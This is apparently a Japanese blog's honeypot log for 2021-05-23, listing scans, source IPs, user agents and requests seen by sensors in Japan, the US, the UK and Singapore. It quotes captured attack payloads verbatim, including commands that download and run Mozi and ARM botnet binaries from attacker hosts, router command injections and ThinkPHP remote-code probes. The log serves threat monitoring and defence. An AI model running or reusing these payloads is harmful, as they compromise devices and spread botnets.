コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/05/23 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/05/23分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

aiohttpによるスキャン行為
Pe7kataによるスキャン行為
zgrabによるスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm arm arm7;
wget http:/\\/45.14.149.244/arm7;
chmod 777 arm7;
./arm7 starcam;
wget http:/\\/45.14.149.244/arm;
chmod 777 arm;
./arm starcam
Location:US

NetGear製品の脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2019-2725)を狙うアクセス
aiohttpによるスキャン行為
Pe7kataによるスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
45[.]81[.]233[.]185に関する不正通信
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//39[.]83[.]218[.]55:58618/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm arm arm7;
wget http:/\\/45.14.149.244/arm7;
chmod 777 arm7;
./arm7 starcam;
wget http:/\\/45.14.149.244/arm;
chmod 777 arm;
./arm starcam
Location:UK

Genexis PLATINUMの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
TerraMaster TOS脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2020-29390)を狙うアクセス
zgrabによるスキャン行為
.7zへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
を確認しました。

Location:SG

aiohttpによるスキャン行為
Anarchy99によるスキャン行為
bitdiscoveryによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//115[.]201[.]44[.]30:45661/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//58[.]255[.]134[.]233:54559/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//60[.]220[.]95[.]126:50430/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm arm arm7;
wget http:/\\/45.14.149.244/arm7;
chmod 777 arm7;
./arm7 starcam;
wget http:/\\/45.14.149.244/arm;
chmod 777 arm;
./arm starcam
アクセス数推移

JP:総アクセス数:58 (前日比:-23)
US:総アクセス数:230 (前日比:+160)
UK:総アクセス数:83 (前日比:-373)
SG:総アクセス数:50 (前日比:-164)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.8.10.202 Russia
1 13.56.236.152 United States
1 13.82.143.41 United States
1 37.49.229.222 Belize
1 40.124.55.5 United States
1 42.230.18.181 China
1 44.234.39.57 United States
11 45.146.164.125 Russia
1 47.241.193.60 United States
7 51.141.55.151 United Kingdom
1 80.82.78.39 United Kingdom
1 91.205.173.252 Germany
1 121.34.149.42 China
1 128.14.134.134 United States
10 129.204.8.130 China
4 132.145.151.103 United States
2 132.145.196.125 United States
1 138.197.160.142 United States
1 139.162.145.250 Netherlands
1 175.100.20.225 Cambodia
4 185.163.109.66 Romania
1 188.166.168.207 United States
1 192.241.209.208 United States
3 209.141.33.232 United States

UserAgent一覧

件数 UserAgent
8 -
1 Go-http-client/1.1
1 Googlebot/2.1 (+http://www.google.com/bot.html)
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
3 Pe7kata
1 Python/3.8 aiohttp/3.7.4.post0
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01
1 \x16\x03\x01\x02
18 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /api.php?key=1 HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fgdfkgjhsf.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
3 GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.8.10.202 Russia
1 13.56.236.152 United States
1 27.224.136.168 China
1 35.236.243.110 United States
1 36.106.166.167 China
1 37.49.229.222 Belize
1 39.83.218.55 China
1 40.89.169.49 United States
1 40.124.55.5 United States
11 45.146.164.125 Russia
10 54.169.179.98 United States
1 78.128.112.18 Bulgaria
1 80.82.78.39 United Kingdom
1 84.38.186.69 Russia
1 91.205.173.252 Germany
7 101.32.190.157 Singapore
1 110.167.215.241 China
1 113.58.237.232 China
7 116.228.243.2 China
1 117.221.183.252 India
1 123.11.223.229 China
1 123.245.24.101 China
7 125.85.167.151 China
1 139.162.145.250 Netherlands
3 163.172.168.251 United Kingdom
1 171.36.97.187 China
1 171.120.27.103 China
1 172.105.89.161 United States
1 175.100.20.225 Cambodia
1 175.184.166.39 China
1 178.72.76.158 Russia
1 183.136.225.14 China
25 185.128.41.50 Panama
4 185.165.190.34 Seychelles
3 188.40.225.44 Germany
1 193.118.53.202 United States
1 194.48.199.121 United Kingdom
3 209.141.33.232 United States
122 212.8.249.34 Netherlands

UserAgent一覧

件数 UserAgent
13 -
1 Go-http-client/1.1
1 Googlebot/2.1 (+http://www.google.com/bot.html)
1 Hello, world
12 Java/1.8.0_131
4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1 Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
21 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 OPR/55.0.2994.47
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
122 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Pe7kata
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 Python/3.8 aiohttp/3.7.4.post0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01
3 CONNECT 45[.]81[.]233[.]185:4444 HTTP/1.1
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
3 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1
2 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
2 GET /PMA2018/index.php?lang=en HTTP/1.1
2 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_async/AsyncResponseService HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
3 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
3 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
2 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
2 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
2 GET /administrator/db/index.php?lang=en HTTP/1.1
2 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /api.php?key=1 HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /console/ HTTP/1.1
4 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /elrekt.php HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /fgdfkgjhsf.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
3 GET /jenkins/login HTTP/1.1
3 GET /login HTTP/1.1
4 GET /manager/html HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
2 GET /mysql/db/index.php?lang=en HTTP/1.1
2 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
2 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
2 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
3 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
4 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma2011/index.php?lang=en HTTP/1.1
2 GET /pma2012/index.php?lang=en HTTP/1.1
2 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
2 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]221[.]183[.]252:37438/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]11[.]223[.]229:54567/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//39[.]83[.]218[.]55:58618/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
3 GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1
2 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
3 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
3 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
3 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
4 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
3 GET /wp-login.php HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index HTTP/1.1
1 POST /index.action HTTP/1.1
1 POST /index.do HTTP/1.1
1 POST /index.jsp HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
4 POST /invoker/readonly HTTP/1.1
1 POST /login HTTP/1.1
1 POST /login.action HTTP/1.1
1 POST /login.do HTTP/1.1
1 POST /login.jsp HTTP/1.1
4 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//kiedys[.]fun/71d6402ebf555bf86ebd941a08932dc1f1d64c91415eac8e551d2a122aa551e21303e942c590017eaa26c3e76fb879842219657cfef12f8275d39c20e50e67ba5756aeb7ea2a9fa87ad6ae9efc4a23085dc906e991a709829f5567bc1d810643 HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 36.5.220.212 China
1 36.32.3.204 China
1 37.49.229.222 Belize
11 45.146.164.125 Russia
3 59.108.78.99 China
31 80.82.78.39 United Kingdom
1 91.205.173.252 Germany
1 110.177.177.73 China
1 110.177.180.5 China
1 112.112.86.140 China
1 112.230.47.248 China
1 115.63.131.138 China
1 117.194.164.169 India
1 119.39.47.117 China
2 128.14.141.34 United States
10 132.145.154.211 United States
1 139.59.15.46 Singapore
1 139.162.145.250 Netherlands
1 143.198.141.51 United States
1 150.158.212.199 China
1 162.62.123.46 Singapore
1 171.36.244.221 China
1 171.118.227.52 China
1 172.105.89.161 United States
1 182.124.180.171 China
2 185.156.72.27 Russia
1 192.241.211.97 United States
1 202.164.139.26 India
1 221.213.75.100 China
1 223.166.74.4 China

UserAgent一覧

件数 UserAgent
13 -
1 Googlebot/2.1 (+http://www.google.com/bot.html)
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1 Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
30 Mozilla/5.0
5 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
3 \x16\x03\x01
1 \x16\x03\x01\x02
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
1 GET /0.7z HTTP/1.1
1 GET /1.7z HTTP/1.1
1 GET /3.7z HTTP/1.1
1 GET /5.7z HTTP/1.1
1 GET /6.7z HTTP/1.1
1 GET /7.7z HTTP/1.1
1 GET /8.7z HTTP/1.1
1 GET /9.7z HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /a.7z HTTP/1.1
1 GET /api.php?key=1 HTTP/1.1
1 GET /b.7z HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /c.7z HTTP/1.1
2 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A' HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /d.7z HTTP/1.1
1 GET /e.7z HTTP/1.1
1 GET /f.7z HTTP/1.1
1 GET /g.7z HTTP/1.1
1 GET /i.7z HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /j.7z HTTP/1.1
1 GET /l.7z HTTP/1.1
1 GET /m.7z HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /manager/html/ HTTP/1.0
1 GET /n.7z HTTP/1.1
1 GET /o.7z HTTP/1.1
1 GET /p.7z HTTP/1.1
1 GET /q.7z HTTP/1.1
1 GET /r.7z HTTP/1.1
1 GET /s.7z HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]124[.]180[.]171:36735/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /u.7z HTTP/1.1
1 GET /v.7z HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w.7z HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /y.7z HTTP/1.1
1 GET /z.7z HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /include/makecvs.php?Event=%60php%20-r%20%22file_put_contents%28%5C%22setup%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%5C%22%29%29%3B%22%3Bcurl%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%20-O%3Bcurl%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%20-O%3Bphp%20-r%20%22file_put_contents%28%5C%22setup.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%5C%22%29%29%3B%22%3Bwget%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%20-O%20setup%3Bwget%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%20-O%20setup.py%3Bchmod%20777%20setup.py%3Bchmod%20777%20setup%3Bpython2%20setup.py%7C%7Cpython2.7%20setup.py%7C%7Cpython%20setup.py%7C%7C.%2Fsetup.py%7C%7C.%2Fsetup%60 HTTP/1.1
